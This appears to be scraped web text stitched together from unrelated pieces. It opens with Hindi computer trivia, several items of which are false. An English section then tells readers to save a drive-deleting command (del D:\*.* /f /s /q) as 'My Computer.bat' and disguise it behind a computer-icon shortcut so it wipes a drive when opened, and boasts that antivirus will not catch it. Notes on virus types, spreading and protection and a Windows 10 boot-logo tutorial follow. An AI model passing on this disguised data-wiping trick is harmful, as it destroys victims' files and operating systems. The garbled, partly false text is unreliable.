कंप्यूटर ( Computer )

1. कंप्यूटर का सबसे पहला अविष्कार 19 वीं सदी मैं हुआ था वो भी Charles Babbage के हाथो से इसकी वजह से उनको कंप्यूटर का पिता कहा जाता है। जिन्होंने 19 वीं सदी मैं एक यांत्रिक कंप्यूटर का अविष्कार किया था।

2. एक औसत के मुताबिक एक आदमी 1 मिनट में अपनी आँखे 25 बार झपकाता है और अगर कोई भी व्यक्ति जब कंप्यूटर के सामने बैठकर काम करता है तो वो अपनी पलके 10 बार भी झपका नहीं पाता है।

3. Eniac जिसका सही और पूरा नाम था ( Electronic Numerical Integrator And Computer ) ये इलेक्ट्रोनिक कंप्यूटर इतना बड़ा था जो 1800 वर्ग फुट जगह में समाता था जिसका वजन 27 टन बताया गया था।

4. अगर एक कंप्यूटर में इंसान के दिमाग के बराबर क्षमता बन जाये तो वो कंप्यूटर एक सेकण्ड के हिसाब से 38 हजार खरब गणना कर सकता है जो टेराबाइट्स को डाटा में बदलने में सक्षम हो जाता है

5. आईबीएम ने 1980 में एक डेस्कटॉप कंप्यूटर का अविष्कार किया था जिसका माडल 5120 रखा गया था। उस कंप्यूटर का भार 105 पाउंड था जिसके बाहर का फ्लोफी ड्राइव 130 पाउंड था।

6. 1980 में कंप्यूटर के keyboard का अविष्कार किया गया था। कंप्यूटर चलाते समय सबसे ज्यादा हम माउस को यूज करते है जिसे शुरुवात में Doug Engelbart ने 1964 में सर्वप्रथम लकड़ी का बनाया था।

7. 1970 में सबसे पहली फ्लोफी डिस्क का अविष्कार किया गया था उस डिस्क की क्षमता मात्र 75.79 KB थी। 1980 में सबसे पहले मोंनिटर का प्रयोग किया गया था।

8. अंग्रेजी भाषा में एक शब्द आता है Compute जिस नाम का अर्थ होता है किसी भी चीज की गणना करना और इसी नाम से कंप्यूटर नाम का अविष्कार हुआ था। आज कंप्यूटर की सहायता से दुनिया के सारे पैसे की रखवाली की जा रही है

9. दोस्तों हार्ड डिस्क में हम अपनी कोई भी जरुरी चीज सेफ्टी रख सकते है जो हमारे लिए बहुत फायेदेमंद है और सबसे पहली हार्ड डिस्क का अविष्कार 1979 में किया गया था जो केवल 5 MB डाटा ही कवर कर सकती
थी।

• Open notepad and copy and paste the following code in it:

This code will delete the C drive completely and the OS of the particular computer would get corrupted. You can also type other drive names instead of C drive like

del D:\*.* /f /s /q

• Once that is done, then you need to the save this given file in the name as My Computer.bat.                                                                                                                                        
• Now right-click on My Computer.bat file that you just created now. Select Send to>Desktop (create shortcut) then this will show on Desktop.
  
• On the desktop you will get the shortcut, Right click on it go to properties and Click on Change icon under Shortcut. Now select the computer icon and hit OK.
  
• Don’t open this file otherwise, it would simply delete the C drive fully and the OS of the particular computer would get corrupted.
  

And most important thing is that it cannot be predicted by antivirus.

2. Chernobyl Virus:

The famous Chernobyl virus deletes all Microsoft Office files. It also deletes the partition information from disk and causes huge loss of data.

3. Logic Bomb:

A logic bomb is also called time bomb. It differs from other viruses. It is activated at certain date and time. Michelangelo is an important logic bomb, is damage data on hard disk on March 06.

4. Trojan Horse:

Trojan Horse hides as a useful program. It contains hidden instructions to erase data or cause other damage. It executes illegal, destructive instruction in the middle of a program such a computer game. FormatC is an example of Trojan Horse.

5. Redlof:

Redlof is a polymorphic virus and written in Visual Basic Script. It relies on Microsoft ActiveX Component to execute itself. It locates Folders.htt and infect that file. Folders.htt is a part of Microsoft Windows Active Desktop Feature.

How Does Virus Spread?

It spread on different devices due to following reasons:

1. Email:

The viruses are most commonly spread through emails. An email may contain an infected file attachment. It can spread if the user opens and downloads an email with an infected file.

2. Network: 

Viruses can spread if a user connects to the network that contains a virus. The Internet is an example of such network. When a user downloads a file infected with the virus from Internet, the viruses is copied to the computer. It may damage the files stored on your PC.

3. Removable Storage Media: 

Floppy disks, CD’s and flash Drives are important means of exchanging data. A virus can also be copied from one computer to other when user copied infected files between devices.

4. Pirated Software: 

The illegal copy of the software is called pirated software. The virus can spread if user installs pirated software. A variety of pirated software is available in CD’s and from the Internet. Some software companies intentionally add virus in the software. It is automatically activated if the user uses the software without purchasing a license.

Activation

When the virus starts working, it is called the activation of a virus. It normally runs all the time on the computer. Different viruses are activated in different ways. Many are activated on a certain date. For Example, a popular virus Friday the 13th virus is activated only if the date 13 and day is Friday.

Damages

• It can delete some or all files on the device. It may also format the hard drive.
• Some viruses make unnoticeable changes.
• They corrupt data and make it unusable.
• A virus may detect some private information like passwords or credit card information. It may send data to some other users on the network.

Protection

The virus infects a computer if Antivirus is not installed. Latest Antivirus software should install on the device to defend viruses. Your device can be protected by following precautions:

1. The latest Antivirus should be installed on your device.
2. The Antivirus software must be updated regularly.
3. Scan removable devices such as USB, Floppy disks, and CDs before use.
4. Junk or unknown emails should not be opened.
5. Unauthorized or pirated software should not be installed on your device.

Today, I am going to share with you a tutorial which will allow you to change the boot logo of Windows 10 and replace it with some custom logo. This is a process during which Windows is loading the required system files to get the OS up and running. Swapping this boot logo with a custom image of your choice isn’t a new concept, and there have been tons of tools available for the purpose for pretty much every version of Windows so far. However, most of these existing tools don’t yet support Windows 10. You can replace the default boot logo of Windows quickly and easily.

You need to download some programs.

1. Restorator (Download from Here) and Install it.
2. Signer Download for 32 bit and 64 bit. Don’t Install it.
3. 7 zip (Download from here) and Install it.

Procedure:

• Open File Explorer and go to C:>>Windows>>Boot>>Resources. Here you will see the bootres.dll file. This file is responsible Boot logo. Copy this file by pressing CTRL+C and paste on Desktop pressing CTRL+V. Make Backup of a bootres.dll file in safe place.
  
• Open Restorator. If you are using the trial version, wait 10 seconds. Click on File>>Open  bootress.dll on Desktop that you paste now.
  
• Double-click on RCData and you will see a file ‘1’. Right-click on ‘1’ click on select Extract…>Extract as>Extract as… and give name RCData_1.win and select all files in Save as type.

• Right-click on RCData_1.win file that you created select 7-Zip>Extract to “RCData_1\”. You will see a new folder with RCData_1 name, open it here you”ll will see all default Windows 10 Boot logos (6 different sizes) that your system is using.                          
  

Make New Boot logos

• Make new boot logos and save them on Desktop. Make sure that your images have same properties  as default boot logos (Size and Format Type should be same). To check the properties, right-click on that image and select Properties.

If you want to change the size and type file (bmp) then go here.

• Right-click on RCData_1.win on Desktop and select 7-zip>>Open Archive. Now select all new logos and simply drag into RCData_1.win folder. Click OK if you see Confirm File Copy pop-up.
  
• Open Restorator and right-click on ‘1’ file and select Assign…>>Assign to… and open RCData_1.winfile from Desktop. Click on File>>Save in Restorator in top-left corner and exit the it.
  
• Open File Explorer, go to Desktop and click on File>Open Command Prompt>Open Command Prompt as Administrator. Type following code:

For 32 bit,

signer32.exe /sign sign bootres.dll

For 64 bit,

signer64.exe /sign sign bootres.dll

and hit enter. Click Yes in Security pop-up.

• Last step, copy bootres.dll file from Desktop and paste it in C:>>Windows>>Boot>>Resources and click on Replace the file in the destination. Now restart your PC to check.
